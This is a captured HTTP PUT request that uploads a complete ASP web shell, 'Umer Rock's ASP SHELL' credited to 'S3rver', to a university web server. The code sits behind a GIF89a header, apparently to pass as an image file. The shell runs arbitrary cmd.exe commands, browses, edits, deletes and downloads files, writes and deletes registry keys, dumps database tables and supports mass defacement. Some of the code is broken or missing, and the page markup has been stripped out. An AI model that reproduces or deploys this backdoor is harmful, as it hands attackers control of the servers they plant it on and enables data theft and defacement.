PUT /byHmei7.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: oucsace.cs.ohiou.edu
Content-Length: 57180
Connection: Keep-Alive
Cache-Control: no-cache
GIF89a;
<%@ LANGUAGE = VBScript.Encode%>
<%//**Start Encode
On Error Resume Next
Dim myFSO,showdisks
Set myFSO = CreateObject ("Scripting.FileSystemObject")
showdisks=FALSE
Server.ScriptTimeOut = 7200
Class FileUploader
Public Files
Private mcolFormElem
Private Sub Class_Initialize()
Set Files = Server.CreateObject("Scripting.Dictionary")
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
End Sub
Private Sub Class_Terminate()
If IsObject(Files) Then
Files.RemoveAll()
Set Files = Nothing
End If
If IsObject(mcolFormElem) Then
mcolFormElem.RemoveAll()
Set mcolFormElem = Nothing
End If
End Sub
Public Property Get Form(sIndex)
Form = ""
If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
End Property
Public Default Sub Upload()
Dim biData, sInputName
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
Dim nPosFile, nPosBound
biData = Request.BinaryRead(Request.TotalBytes)
nPosBegin = 1
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
nDataBoundPos = InstrB(1, biData, vDataBounds)
Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
nPos = InstrB(nPos, biData, CByteString("name="))
nPosBegin = nPos + 6
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
nPosBound = InstrB(nPosEnd, biData, vDataBounds)
If nPosFile <> 0 And nPosFile < nPosBound Then
Dim oUploadFile, sFileName
Set oUploadFile = New UploadedFile
nPosBegin = nPosFile + 10
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
nPosBegin = nPos + 14
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosBegin = nPosEnd+4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
Else
nPos = InstrB(nPos, biData, CByteString(Chr(13)))
nPosBegin = nPos + 4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
End If
nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
Loop
End Sub
Private Function CByteString(sString)
Dim nIndex
For nIndex = 1 to Len(sString)
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
Next
End Function
Private Function CWideString(bsString)
Dim nIndex
CWideString =""
For nIndex = 1 to LenB(bsString)
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
Next
End Function
End Class
Class UploadedFile
Public ContentType
Public FileName
Public FileData
Public Property Get FileSize()
FileSize = LenB(FileData)
End Property
Public Sub SaveToDisk(sPath)
Dim oFS, oFile
Dim nIndex
If sPath = "" Or FileName = "" Then Exit Sub
If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
Set oFS = Server.CreateObject("Scripting.FileSystemObject")
If Not oFS.FolderExists(sPath) Then Exit Sub
Set oFile = oFS.CreateTextFile(sPath & FileName, True)
For nIndex = 1 to LenB(FileData)
oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
Next
oFile.Close
End Sub
Public Sub SaveToDatabase(ByRef oField)
If LenB(FileData) = 0 Then Exit Sub
If IsObject(oField) Then
oField.AppendChunk FileData
End If
End Sub
End Class
startcode = ".:: Umer Rock's ASP SHELL.... ::."
endocde = ""
onlinehelp = ".:: ONLINE HELP ::.
"
Function HexConv(hexVar)
Dim hxx, hxx_var, multiply
IF hexVar <> "" THEN
hexVar = UCASE(hexVar)
hexVar = StrReverse(hexVar)
DIM hx()
REDIM hx(LEN(hexVar))
hxx = 0
hxx_var = 0
FOR hxx = 1 TO LEN(hexVar)
IF multiply = "" THEN multiply = 1
hx(hxx) = mid(hexVar,hxx,1)
hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var
multiply = (multiply * 16)
NEXT
hexVar = hxx_var
HexConv = hexVar
END IF
End Function
cprthtml = ".:: 3FEShell 1.0 ::."
Function get_hxno(ghx)
If ghx = "A" Then
ghx = 10
ElseIf ghx = "B" Then
ghx = 11
ElseIf ghx = "C" Then
ghx = 12
ElseIf ghx = "D" Then
ghx = 13
ElseIf ghx = "E" Then
ghx = 14
ElseIf ghx = "F" Then
ghx = 15
End If
get_hxno = ghx
End Function
keydec=".:: Smart.Shell 1.0 © BY Umer Rock - .:UmerRock@live.com:."
Function showobj(objpath)
showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath))
End Function
Function showobjpath(objpath)
showobjpath = Left(objpath,InstrRev(objpath,"\"))
End Function
Function checking(a,b)
' If CStr(Mid(a,95,13)) = CStr(Mid(b,95,13)) Then
' pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) & "?action=error"
' Response.Redirect(pagina)
' End If
End Function
Sub hdr()
Response.Write startcode
Response.Write keydec
Response.Write "
"
End Sub
sub araBul(path_,ara_)
on error resume next
If Len(path_) > 0 Then
cur = path_&"\"
If cur = "\\" Then cur = ""
parent = ""
If InStrRev(cur,"\") > 0 Then
parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
End If
Else
cur = ""
End If
Set f = myFSO.GetFolder(cur)
Set fc = f.Files
For Each f1 In fc
if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
downStr = "?/a>"
if lcase(ara_)="mdb" then
Response.Write downStr&"?/a> * "& f1.path &" ["&f1.size&"]"&"
"
else
Response.Write downStr&"?/a>! - "& f1.path &" ["&f1.size&"]
"
end if
end if
Next
Set fs = f.SubFolders
For Each f1 In fs
araBul f1.path,ara_
Next
Set f = Nothing
Set fc = Nothing
Set fs = Nothing
end sub
Sub showcontent()
showdisks=TRUE
Response.Write ".:: DRIVES ::.
.:: SCRIPT PATH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "
"
If Trim(Request.QueryString("raiz")) = "root" Then
Set fs=Server.Createobject("Scripting.FileSystemObject")
Set drivecollection=fs.drives
Response.Write ""
For Each drive IN drivecollection
str=drive.driveletter & ":"
Response.Write "" & UCase(str) & "
"
Select Case drive.DriveType
Case 0
tipodrive = "Unknown"
nomedrive = drive.VolumeName
Case 1
tipodrive = "Removable"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
Case 2
tipodrive = "Fixed"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
Case 3
tipodrive = "Network"
If drive.isready Then
nomedrive = drive.ShareName
Else
nomedrive = ""
End If
Case 4
tipodrive = "CD-Rom"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
Case 5
tipodrive = "RAM Disk"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
End Select
response.write "Type: " & tipodrive & "
"
response.write "Name: " & nomedrive & "
"
response.write "File System: "
If drive.isready Then
set sp=fs.getdrive(str)
response.write sp.filesystem & "
"
Else
response.write "-
"
End If
Response.Write "Disk Space: "
If drive.isready Then
freespace = (drive.AvailableSpace / 1048576)
set sp=fs.getdrive(str)
response.write(Round(freespace,1) & " MB
")
Else
response.write("-
")
End If
Response.Write "Total Space: "
If drive.isready Then
totalspace = (drive.TotalSize / 1048576)
set sp=fs.getdrive(str)
response.write(Round(totalspace,1) & " MB
")
Else
response.write("-
")
End If
Response.Write "
"
Next
Response.Write ""
Set fs = Nothing
Set drivecollection = Nothing
set sp=Nothing
Else
If Trim(Request.QueryString("raiz")) = "" Then
caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
pos = Instr(caminho,"\")
pos2 = 1
While pos2 <> 0
If Instr(pos + 1,caminho,"\") <> 0 Then
pos = Instr(pos + 1,caminho,"\")
Else
pos2 = 0
End If
Wend
raiz = Left(caminho,pos)
Else
raiz = trim(Request.QueryString("raiz")) & "\"
End If
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MonRep = ObjFSO.GetFolder(raiz)
Set ColFolders = MonRep.SubFolders
Set ColFiles0 = MonRep.Files
Response.Write "MASS TEST IN " & UCase(raiz) & "
"
Response.Write "MASS DEFACE IN " & UCase(raiz) & "
"
Response.Write "UPLOAD FILE TO " & UCase(raiz) & "
"
Response.Write ""
Response.Write "PROMPT"
Response.Write " - SYS INFO"
Response.Write " - REGEDIT"
Response.Write " - SEARCH"
Response.Write " - EXECUTE SQL"
Response.Write " - ABOUT"
Response.Write "
"
Response.Write "Root Folder: " & raiz & "
"
If CInt(Len(raiz) - 1) <> 2 Then
barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1
backlevel = Left(raiz,barrapos)
Response.Write "<DIR> . .
"
Else
Response.Write "<DIR> . .
"
End If
Response.Write "
"
marcatabela = true
for each FilesItem0 in ColFiles0
If marcatabela = true then
corfundotabela = " bgcolor=""#EEEEEE"""
Else
corfundotabela = ""
End If
Response.Write ":: " & showobj(FilesItem0.path) & "| " & FormatNumber(FilesItem0.size/1024, 0) & " Kbytes | o.GET.o | o.REN.o | o.DEL.o | o.VIEW.o | o.EDIT.o | o.?ndir.o | o.FileCopy.o |
"
marcatabela = NOT marcatabela
next
Response.Write "
"
End If
End Sub
Select Case Trim(Request.QueryString("action"))
Case "get"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
MyFile.Copy (destino)
If Err.Number = 0 Then
Response.Write "
File: " & caminho & "
Copied to: " & destino
End If
Case "put"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
If Trim(Request.QueryString("arquivo")) = "" Then
caminho = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
varpath = Trim(Request.QueryString("path"))
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MonRep = ObjFSO.GetFolder(caminho)
Set ColFolders = MonRep.SubFolders
Set ColFiles0 = MonRep.Files
Response.Write "Select File:
"
for each FilesItem0 in ColFiles0
Response.Write "| :: " & showobj(FilesItem0.path) & " | " & FormatNumber(FilesItem0.size/1024, 0) & " Kbytes | :: SELECT :: |
"
next
Response.Write "
"
Else
destino = Replace(Trim(Request.QueryString("path")),"|","\") & "\"
arquivo = Replace(Trim(Request.QueryString("arquivo")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(arquivo)
MyFile.Copy (destino)
If Err.Number = 0 Then
Response.Write "
File: " & arquivo & "
Copied to: " & destino
End If
End If
Case "del"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
MyFile.Delete
If Err.Number = 0 Then
Response.Write ""
Response.Write "
Folder " & caminho & " Deleted.
"
End If
Case "fdel"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
ObjFSO.DeleteFolder caminho
If Err.Number = 0 Then
Response.Write ""
Response.Write "
File " & caminho & " Deleted.
"
End If
Case "ren"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
If Trim(Request.QueryString("status")) <> "2" Then
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
arquivo = showobj(caminho)
Response.Write "
" & arquivo & "
" & _
"
"
Else
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.QueryString("newname"))
MyFile.Move (destino)
If Err.Number = 0 Then
Response.Write "
Arquivo: " & caminho & "
renomeado para: " & destino
Response.Write ""
End If
End If
Case "error"
Response.Write " C?DIGO CORROMPIDO
CORRUPT CODE"
Case "cmd"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.QueryString(".CMD")
If (szCMD <> "") Then
szTempFile = "c:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
Response.Write "
"
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write ""
Response.Write Replace(Replace(Server.HTMLEncode(oFile.ReadAll),VbCrLf,"
")," "," ")
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
Case "info"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Set WshNetwork = Server.CreateObject("WScript.Network")
Set WshShell = Server.CreateObject("WScript.Shell")
Set WshEnv = WshShell.Environment("SYSTEM")
Response.Write "
"
Response.Write "User Properties:
"
Response.Write "UserName: " & WshNetwork.UserName & "
"
Response.Write "Computer Name: " & WshNetwork.ComputerName & "
"
Response.Write "User Domain: " & WshNetwork.UserDomain & "
"
Set Drives = WshNetwork.EnumNetworkDrives
For i = 0 to Drives.Count - 1
Response.Write "Drive de Rede (Mapeado): " & Drives.Item(i) & "
"
Next
Response.Write "
Cpu Information:
"
Response.Write "Processor Architecture: " & WshEnv("PROCESSOR_ARCHITECTURE") & "
"
Response.Write "Number Of Processors: " & WshEnv("NUMBER_OF_PROCESSORS") & "
"
Response.Write "Processor Identifier: " & WshEnv("PROCESSOR_IDENTIFIER") & "
"
Response.Write "Processor Level: " & WshEnv("PROCESSOR_LEVEL") & "
"
Response.Write "Processor Revision: " & WshEnv("PROCESSOR_REVISION") & "
"
Response.Write "
Operating System Information:
"
Response.Write "IP: " & request.servervariables("LOCAL_ADDR") & "
"
Response.Write "Sistem OS: " & WshEnv("OS") & "
"
Response.Write "Server Software: " & request.servervariables("SERVER_SOFTWARE") & "
"
Response.Write "Cmd Path: " & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "
"
Response.Write "Public Paths: " & WshEnv("PATH") & "
"
Response.Write "Executables: " & WshEnv("PATHEXT") & "
"
Response.Write "Prompt: " & WshEnv("PROMPT") & "
"
Response.Write "System Drive: " & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "
"
Response.Write "System Root: " & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "
"
Response.Write "System32 Path: " & WshShell.CurrentDirectory & "
"
Set Drives = Nothing
Set WshNetwork = Nothing
Set WshShell = Nothing
Set WshEnv = Nothing
Case "reg"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Set WshShell = Server.CreateObject("WScript.Shell")
Response.Write "
Registry Editor:
"
Select Case Trim(Request.QueryString("regaction"))
Case "w"
If Trim(Request.QueryString("process")) = "yes" Then
Select Case Trim(Request.QueryString("type"))
Case "1"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ")
Case "2"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_DWORD")
Case "3"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_BINARY")
Case "4"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EXPAND_SZ")
Case "5"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MULTI_SZ")
End Select
Response.Write "
Registry "
Response.Write Trim(Request.QueryString("key")) & " Changed."
Response.Write "
Main Menu
"
Else
Response.Write "
| ROOT KEY NAME | ABREVIAC?O |
"
Response.Write "| HKEY_CURRENT_USER | HKCU |
"
Response.Write "| HKEY_LOCAL_MACHINE | HKLM |
"
Response.Write "| HKEY_CLASSES_ROOT | HKCR |
"
Response.Write "| HKEY_USERS | HKEY_USERS |
"
Response.Write "| HKEY_CURRENT_CONFIG | HKEY_CURRENT_CONFIG |
"
Response.Write "
| Type | Description | Figure |
"
Response.Write "| REG_SZ | String | String |
"
Response.Write "| REG_DWORD | Number | DWORD |
"
Response.Write "| REG_BINARY | Binary | VBArray DWORD |
"
Response.Write "| REG_EXPAND_SZ | String Expand (ex. ""%windir%\\calc.exe"") | String |
"
Response.Write "| REG_MULTI_SZ | Array Of Strings | VBArray Of Strings |
"
Response.Write "
"
End If
Response.Write "
Main Menu
"
Case "d"
If Trim(Request.QueryString("process")) = "yes" Then
teste = WshShell.RegDelete (Trim(Request.QueryString("key")))
Response.Write "Chave " & Trim(Request.QueryString("key")) & " Deleted."
Else
Response.Write "
"
End If
Response.Write "
Main Menu
"
Case Else
Response.Write "WRITE VALUE
"
Response.Write "READ VALUE
"
Response.Write "DELETE KEY
"
End Select
Set WshShell = Nothing
Case "txtview"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp & ""
file = Replace(Trim(Request.QueryString("file")),"|","\")
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.OpenTextFile(file)
Response.Write Replace(Replace(Server.HTMLEncode(a.ReadAll),VbCrLf,"
")," "," ")
Set a = Nothing
Set fso = Nothing
Case "txtedit"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
If Request.Form.Count = 0 Then
file = Replace(Trim(Request.QueryString("file")),"|","\")
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.OpenTextFile(file)
Response.Write "
"
Set a = Nothing
Set fso = Nothing
Else
Select Case Trim(Request.Form("savemethod"))
Case "Save"
Set fso = CreateObject("Scripting.FileSystemObject")
novotexto = Trim(Request.Form("content"))
novotexto = Split(novotexto,vbCrLf)
Set objstream = fso.OpenTextFile(Replace(Trim(Request.Form("path")),"|","\"),2)
For i = 0 To UBound(novotexto)
objstream.WriteLine(novotexto(i))
Next
objstream.Close
Set objstream = Nothing
Response.Write "Texto salvo: " & Replace(Trim(Request.Form("path")),"|","\") & ""
Case "Save as"
Set fso = CreateObject("Scripting.FileSystemObject")
novotexto = Trim(Request.Form("content"))
novotexto = Split(novotexto,vbCrLf)
caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
Set objstream = fso.CreateTextFile(caminho,true,false)
For i = 0 To UBound(novotexto)
objstream.WriteLine(novotexto(i))
Next
objstream.Close
Set objstream = Nothing
Response.Write "
"
Case Else
caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.Form("filename"))
MyFile.Move (destino)
If Err.Number = 0 Then
Response.Write "
Arquivo: " & destino & " salvo!"
Response.Write ""
End If
End Select
End If
Case "download"
Response.Buffer = True
Response.Clear
strFileName = Replace(Trim(Request.QueryString("file")),"|","\")
strFile = Right(strFileName, Len(strFileName) - InStrRev(strFileName,"\"))
strFileType = Request.QueryString("type")
if strFileType = "" then strFileType = "application/download"
Set fso = Server.CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(strFilename)
intFilelength = f.size
Set f = Nothing
Set fso = Nothing
Response.AddHeader "Content-Disposition", "attachment; filename=" & strFile
Response.AddHeader "Content-Length", intFilelength
Response.Charset = "UTF-8"
Response.ContentType = strFileType
Set Stream = Server.CreateObject("ADODB.Stream")
Stream.Open
Stream.type = 1
Stream.LoadFromFile strFileName
Response.BinaryWrite Stream.Read
Response.Flush
Stream.Close
Set Stream = Nothing
Case "upload"
If Request.QueryString("processupload") <> "yes" Then
Response.Write "
"
Else
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
arquivomassdfc = patharquivotxt & "teste.txt"
Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False)
vetordelinhas = Split(Request.Form("content"),VbCrLf)
For i = 0 To UBound(vetordelinhas)
Arquivotxt.WriteLine(vetordelinhas(i))
Next
Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc)
If Request.Form("massopt") = "single" Then
Call themassdeface(caminho,"single",ObjFSO,MeuArquivo)
ElseIf Request.Form("massopt") = "brute" Then
Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo)
End If
End If
End If
End Sub
If Trim(Request.QueryString("massact")) = "test" Then
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
arquivo = patharquivotxt & "_vti_cnf.log"
Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True)
Set MeuArquivo = ObjFSO.GetFile(arquivo)
Call brutemass(Replace(Trim(Request.QueryString("path")),"|","\"),"test")
ElseIf Trim(Request.QueryString("massact")) = "dfc" Then
Call brutemass(Replace(Trim(Request.Form("path")),"|","\"),"dfc")
End If
Case "fcopy"
If Trim(Request.Form("submit1")) = "Copy" Then
mptpath=Trim(Request.Form("path"))
mptdest=Trim(Request.Form("cf"))
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
isl = ""
if Trim(Request.Form("islem"))="kopyala" then
objFSO.CopyFolder mptpath,mptdest
isl="Copied.."
elseif Trim(Request.Form("islem"))="tasi" then
objFSO.MoveFolder mptpath,mptdest
isl="moved.."
end if
response.Write "Command: "&isl
response.Write "
File From: " & mptpath & "
Copy to: " & mptdest
response.Write "
"
Else
Response.Write "
"
End IF
Case "filecopy"
If Trim(Request.Form("submit1")) = "Copy" Then
mptpath=Trim(Request.Form("path"))
mptdest=Trim(Request.Form("cf"))
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
isl = ""
if Trim(Request.Form("islem"))="kopyala" then
objFSO.CopyFile mptpath,mptdest
isl="Copy.."
elseif Trim(Request.Form("islem"))="tasi" then
objFSO.MoveFile mptpath,mptdest
isl="move.."
end if
response.Write "Command: "&isl
response.Write "
File From: " & mptpath & "
Copy to: " & mptdest
response.Write "
"
Else
Response.Write "
"
End IF
Case "search"
If (Trim(Request.Form("submit1")) = "Search") xor Trim(Request.QueryString("status"))<>"" Then
showdisks=FALSE
status5=Trim(Request.Form("status"))
if status5="" then status5=Trim(Request.QueryString("status"))
SELECT CASE status5
CASE "5"
Response.Write ""& Trim(Request.QueryString("path")) &"
"
Response.Write "
"
set f = objFSO.OpenTextFile(Trim(Request.QueryString("path")),1)
Response.Write ""&Server.HTMLEncode(f.readAll)&" "
if err.number=62 then Response.Write "":Response.End
CASE "7":
Response.Write "Tables
"
Set objConn = Server.CreateObject("ADODB.Connection")
Set objADOX = Server.CreateObject("ADOX.Catalog")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Trim(Request.QueryString("path"))
objConn.Open
objADOX.ActiveConnection = objConn
For Each table in objADOX.Tables
If table.Type = "TABLE" Then
Response.Write "4 "&table.Name&"
"
End If
Next
CASE "8":
table=Trim(Request.QueryString("table"))
Response.Write "Table Name: " & table & "
"
Set objConn = Server.CreateObject("ADODB.Connection")
Set objRcs = Server.CreateObject("ADODB.RecordSet")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Trim(Request.QueryString("path"))
objConn.Open
objRcs.Open table,objConn, adOpenKeyset , , adCmdText
Response.Write " "
for i=0 to objRcs.Fields.count-1
Response.Write "| "&objRcs.Fields(i).Name&" | "
next
Response.Write " "
do while not objRcs.EOF
Response.Write ""
for i=0 to objRcs.Fields.count-1
Response.Write "| "&objRcs.Fields(i).Value&" | "
next
Response.Write " "
objRcs.MoveNext
loop
Response.Write "
"
case "12": araBul Trim(Request.Form("path")),Trim(Request.Form("arama"))
END SELECT
Else
showdisks=FALSE
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write " "
End IF
Case "sqlserver"
If (Trim(Request.Form("submit1")) = "Execute SQL Server Command") xor Trim(Request.QueryString("status"))<>"" Then
showdisks=FALSE
status5=Trim(Request.Form("status"))
if status5="" then status5=Trim(Request.QueryString("status"))
SELECT CASE status5
CASE "7":
Response.Write "Tables
"
Set objConn = Server.CreateObject("ADODB.Connection")
Set objADOX = Server.CreateObject("ADOX.Catalog")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Trim(Request.QueryString("path"))
objConn.Open
objADOX.ActiveConnection = objConn
For Each table in objADOX.Tables
If table.Type = "TABLE" Then
Response.Write "4 "&table.Name&"
"
End If
Next
CASE "8":
table=Trim(Request.QueryString("table"))
Response.Write "Table Name: " & table & "
"
Set objConn = Server.CreateObject("ADODB.Connection")
Set objRcs = Server.CreateObject("ADODB.RecordSet")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Trim(Request.QueryString("path"))
objConn.Open
objRcs.Open table,objConn, adOpenKeyset , , adCmdText
Response.Write " "
for i=0 to objRcs.Fields.count-1
Response.Write "| "&objRcs.Fields(i).Name&" | "
next
Response.Write " "
do while not objRcs.EOF
Response.Write ""
for i=0 to objRcs.Fields.count-1
Response.Write "| "&objRcs.Fields(i).Value&" | "
next
Response.Write " "
objRcs.MoveNext
loop
Response.Write "
"
END SELECT
Else
showdisks=FALSE
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write " "
End IF
Case "about"
showdisks=FALSE
checa = checking(cprthtml,keydec)
Call hdr()
response.Write "
Coded By S3rver"
response.Write "
"
response.Write "WebSite: :)"
response.Write "
"
response.Write "E-Mail: Pouya.S3rver@Gmail.Com"
response.Write "
"
response.Write "Hackers, Crackers, Programmers Forever!"
Case Else
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Call showcontent()
End Select
If Err.Number <> 0 Then
Response.Write "
ERRO: " & Err.Number & "
" & UCase(Err.Description) & "
Acesse denied."
End If
Response.Write endcode
if showdisks then
%>
<%
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Response.Write "
| Drives | "
for each drive_ in objFSO.Drives
Response.Write ""
Response.write ";"
if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]"
if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]"
if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]"
if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]"
Response.Write " | "
next
Response.Write ""
Response.write "H Local Path"
Response.Write " | "
Response.Write "
"
end if
%>
|